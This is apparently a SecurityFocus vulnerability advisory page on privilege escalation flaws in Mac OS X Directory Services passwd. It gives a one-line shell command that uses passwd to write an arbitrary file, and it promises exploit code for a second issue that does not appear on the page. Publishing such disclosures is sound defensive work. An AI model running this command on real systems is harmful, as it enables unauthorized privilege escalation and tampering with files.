Apple Mac OS X Directory Services Passwd Privilege Escalation Vulnerabilities


An exploit is not required.

To exploit the first issue, the attacker executes the following:

umask 0;/usr/bin/passwd -i file -l <filename>

where <filename> is the path and name of another file on the system.

The following code is available to exploit the second issue:


 

Privacy Statement
Copyright 2010, SecurityFocus